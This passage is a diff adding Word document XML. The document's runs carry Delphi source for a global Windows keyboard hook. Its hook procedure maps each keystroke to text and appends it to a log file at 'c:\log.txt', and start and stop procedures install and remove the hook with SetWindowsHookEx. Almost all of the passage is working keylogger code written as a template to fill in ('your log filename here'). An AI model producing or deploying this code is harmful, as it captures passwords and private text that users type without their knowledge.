+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>));</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>ToAscii</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>VirtualKey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>ScanCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>KeyState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>AChar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>, 0);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // exceptions</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      case </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>VirtualKey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        VK_BACK: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 'Backspace';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        VK_DELETE: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 'Delete';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        VK_TAB: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 'Tab';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        VK_RETURN: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 'Enter';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        VK_SHIFT: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 'Shift';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        VK_CAPITAL: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>CapsLock</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        VK_ESCAPE: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 'Esc';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        VK_SPACE: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 'Space';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        // etc. keys you're interested in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      else</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>AChar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>[0];</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>LogText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>LogText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // open the log file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>FileName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 'c:\log.txt'; // your log filename here</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>AssignFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(FF, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>FileName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      if </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>FileExists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>FileName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>) then Append(FF)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      else Rewrite(FF);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // write to the log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>WriteLn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(FF, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>LogText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // close the log file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>CloseFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(FF);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  {Call the next hook in the hook chain}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (Code &lt; 0) then</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    result := </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>CallNextHookEx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TheHookHandle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, Code, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>wParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">procedure </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>StartTheHook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>stdcall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TheHookHandle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 0) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    // set the hook</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TheHookHandle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>SetWindowsHookEx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(WH_GETMESSAGE, @</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TheHookProc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>hInstance</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>, 0);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">procedure </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>StopTheHook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>stdcall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TheHookHandle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt;&gt; 0) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    // Remove our hook and clear our hook handle</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>UnhookWindowsHookEx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TheHookHandle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>) &lt;&gt; FALSE) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TheHookHandle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 0;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
